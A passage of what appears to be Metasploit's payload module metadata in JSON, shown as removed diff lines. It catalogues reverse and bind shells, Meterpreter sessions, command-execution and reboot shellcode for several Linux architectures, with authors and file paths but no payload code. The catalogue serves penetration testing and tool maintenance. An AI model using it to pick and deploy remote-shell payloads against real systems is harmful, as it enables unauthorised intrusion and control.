- "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "mipsbe", - "rport": null, - "autofilter_ports": null, 
- "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "linux/mipsbe/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mipsbe/meterpreter_reverse_https": { - "name": "Linux Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/linux/mipsbe/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "mipsbe", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "linux/mipsbe/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mipsbe/meterpreter_reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Inline", - "fullname": "payload/linux/mipsbe/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "mipsbe", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": 
"/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/mipsbe/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mipsbe/reboot": { - "name": "Linux Reboot", - "fullname": "payload/linux/mipsbe/reboot", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Michael Messner ", - "rigan - " - ], - "description": "A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes or executing\n other payloads that rely on initial startup procedures.", - "references": [ - "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" - ], - "platform": "Linux", - "arch": "mipsbe", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mipsbe/reboot.rb", - "is_install_path": true, - "ref_name": "linux/mipsbe/reboot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mipsbe/shell/reverse_tcp": { - "name": "Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/linux/mipsbe/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "juan vazquez ", - "tkmru" - ], - "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "mipsbe", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb", - 
"is_install_path": true, - "ref_name": "linux/mipsbe/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/mipsbe/shell", - "stager_refname": "linux/mipsbe/reverse_tcp" - }, - "payload_linux/mipsbe/shell_bind_tcp": { - "name": "Linux Command Shell, Bind TCP Inline", - "fullname": "payload/linux/mipsbe/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "scut", - "vaicebine", - "Vlatko Kosturjak", - "juan vazquez " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "mipsbe", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/mipsbe/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mipsbe/shell_reverse_tcp": { - "name": "Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/linux/mipsbe/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "rigan ", - "juan vazquez " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [ - "EDB-18226" - ], - "platform": "Linux", - "arch": "mipsbe", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/mipsbe/shell_reverse_tcp", - "check": false, - 
"post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mipsle/exec": { - "name": "Linux Execute Command", - "fullname": "payload/linux/mipsle/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Michael Messner ", - "entropy " - ], - "description": "A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes as well as\n on targets with extremely limited buffer space.", - "references": [ - "EDB-17940" - ], - "platform": "Linux", - "arch": "mipsle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mipsle/exec.rb", - "is_install_path": true, - "ref_name": "linux/mipsle/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mipsle/meterpreter/reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Stager", - "fullname": "payload/linux/mipsle/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "juan vazquez ", - "tkmru" - ], - "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "mipsle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/mipsle/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": 
false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/mipsle/meterpreter", - "stager_refname": "linux/mipsle/reverse_tcp" - }, - "payload_linux/mipsle/meterpreter_reverse_http": { - "name": "Linux Meterpreter, Reverse HTTP Inline", - "fullname": "payload/linux/mipsle/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "mipsle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "linux/mipsle/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mipsle/meterpreter_reverse_https": { - "name": "Linux Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/linux/mipsle/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "mipsle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "linux/mipsle/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - 
"staged": false - }, - "payload_linux/mipsle/meterpreter_reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Inline", - "fullname": "payload/linux/mipsle/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "mipsle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/mipsle/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mipsle/reboot": { - "name": "Linux Reboot", - "fullname": "payload/linux/mipsle/reboot", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Michael Messner ", - "rigan - " - ], - "description": "A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes.", - "references": [ - "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" - ], - "platform": "Linux", - "arch": "mipsle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mipsle/reboot.rb", - "is_install_path": true, - "ref_name": "linux/mipsle/reboot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mipsle/shell/reverse_tcp": { - "name": "Linux Command Shell, Reverse TCP Stager", - 
"fullname": "payload/linux/mipsle/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "juan vazquez ", - "tkmru" - ], - "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "mipsle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/mipsle/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/mipsle/shell", - "stager_refname": "linux/mipsle/reverse_tcp" - }, - "payload_linux/mipsle/shell_bind_tcp": { - "name": "Linux Command Shell, Bind TCP Inline", - "fullname": "payload/linux/mipsle/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "scut", - "vaicebine", - "Vlatko Kosturjak", - "juan vazquez " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "mipsle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/mipsle/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mipsle/shell_reverse_tcp": { - "name": "Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/linux/mipsle/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - 
"type": "payload", - "author": [ - "rigan ", - "juan vazquez " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "mipsle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/mipsle/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppc/meterpreter_reverse_http": { - "name": "Linux Meterpreter, Reverse HTTP Inline", - "fullname": "payload/linux/ppc/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "ppc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "linux/ppc/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppc/meterpreter_reverse_https": { - "name": "Linux Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/linux/ppc/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - 
"platform": "Linux", - "arch": "ppc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "linux/ppc/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppc/meterpreter_reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Inline", - "fullname": "payload/linux/ppc/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "ppc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/ppc/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppc/shell_bind_tcp": { - "name": "Linux Command Shell, Bind TCP Inline", - "fullname": "payload/linux/ppc/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "ppc, cbea", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": 
"/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/ppc/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppc/shell_find_port": { - "name": "Linux Command Shell, Find Port Inline", - "fullname": "payload/linux/ppc/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Spawn a shell on an established connection", - "references": [], - "platform": "Linux", - "arch": "ppc, cbea", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/ppc/shell_find_port.rb", - "is_install_path": true, - "ref_name": "linux/ppc/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppc/shell_reverse_tcp": { - "name": "Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/linux/ppc/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "ppc, cbea", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/ppc/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - 
"payload_type": 1, - "staged": false - }, - "payload_linux/ppc64/shell_bind_tcp": { - "name": "Linux Command Shell, Bind TCP Inline", - "fullname": "payload/linux/ppc64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "ppc64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/ppc64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppc64/shell_find_port": { - "name": "Linux Command Shell, Find Port Inline", - "fullname": "payload/linux/ppc64/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Spawn a shell on an established connection", - "references": [], - "platform": "Linux", - "arch": "ppc64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/ppc64/shell_find_port.rb", - "is_install_path": true, - "ref_name": "linux/ppc64/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppc64/shell_reverse_tcp": { - "name": "Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/linux/ppc64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": 
[ - "Ramon de C Valle " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "ppc64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/ppc64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppc64le/meterpreter_reverse_http": { - "name": "Linux Meterpreter, Reverse HTTP Inline", - "fullname": "payload/linux/ppc64le/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "ppc64le", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "linux/ppc64le/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppc64le/meterpreter_reverse_https": { - "name": "Linux Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/linux/ppc64le/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": 
"Linux", - "arch": "ppc64le", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "linux/ppc64le/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppc64le/meterpreter_reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Inline", - "fullname": "payload/linux/ppc64le/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "ppc64le", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/ppc64le/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppce500v2/meterpreter_reverse_http": { - "name": "Linux Meterpreter, Reverse HTTP Inline", - "fullname": "payload/linux/ppce500v2/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "ppce500v2", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": 
null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "linux/ppce500v2/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppce500v2/meterpreter_reverse_https": { - "name": "Linux Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/linux/ppce500v2/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "ppce500v2", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "linux/ppce500v2/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppce500v2/meterpreter_reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Inline", - "fullname": "payload/linux/ppce500v2/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "ppce500v2", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": 
"/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/ppce500v2/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/riscv32le/exec": { - "name": "Linux Execute Command", - "fullname": "payload/linux/riscv32le/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "modexp", - "bcoles " - ], - "description": "Execute an arbitrary command", - "references": [ - "URL-https://modexp.wordpress.com/2022/05/02/shellcode-risc-v-linux/", - "URL-https://github.com/odzhan/shellcode/blob/master/os/linux/riscv64/cmd.s" - ], - "platform": "Linux", - "arch": "riscv32le", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-14 09:31:03 +0000", - "path": "/modules/payloads/singles/linux/riscv32le/exec.rb", - "is_install_path": true, - "ref_name": "linux/riscv32le/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/riscv32le/reboot": { - "name": "Linux Reboot", - "fullname": "payload/linux/riscv32le/reboot", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bcoles " - ], - "description": "A very small shellcode for rebooting the system using\n the reboot syscall. 
This payload is sometimes helpful\n for testing purposes.", - "references": [], - "platform": "Linux", - "arch": "riscv32le", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-14 09:31:03 +0000", - "path": "/modules/payloads/singles/linux/riscv32le/reboot.rb", - "is_install_path": true, - "ref_name": "linux/riscv32le/reboot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/riscv64le/exec": { - "name": "Linux Execute Command", - "fullname": "payload/linux/riscv64le/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "modexp", - "bcoles " - ], - "description": "Execute an arbitrary command", - "references": [ - "URL-https://modexp.wordpress.com/2022/05/02/shellcode-risc-v-linux/", - "URL-https://github.com/odzhan/shellcode/blob/master/os/linux/riscv64/cmd.s" - ], - "platform": "Linux", - "arch": "riscv64le", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-14 09:31:03 +0000", - "path": "/modules/payloads/singles/linux/riscv64le/exec.rb", - "is_install_path": true, - "ref_name": "linux/riscv64le/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/riscv64le/reboot": { - "name": "Linux Reboot", - "fullname": "payload/linux/riscv64le/reboot", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bcoles " - ], - "description": "A very small shellcode for rebooting the system using\n the reboot syscall. 
This payload is sometimes helpful\n for testing purposes.", - "references": [], - "platform": "Linux", - "arch": "riscv64le", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-14 09:31:03 +0000", - "path": "/modules/payloads/singles/linux/riscv64le/reboot.rb", - "is_install_path": true, - "ref_name": "linux/riscv64le/reboot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x64/exec": { - "name": "Linux Execute Command", - "fullname": "payload/linux/x64/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ricky", - "Geyslan G. Bem " - ], - "description": "Execute an arbitrary command or just a /bin/sh shell", - "references": [], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x64/exec.rb", - "is_install_path": true, - "ref_name": "linux/x64/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x64/meterpreter/bind_tcp": { - "name": "Linux Mettle x64, Bind TCP Stager", - "fullname": "payload/linux/x64/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brent Cook ", - "ricky" - ], - "description": 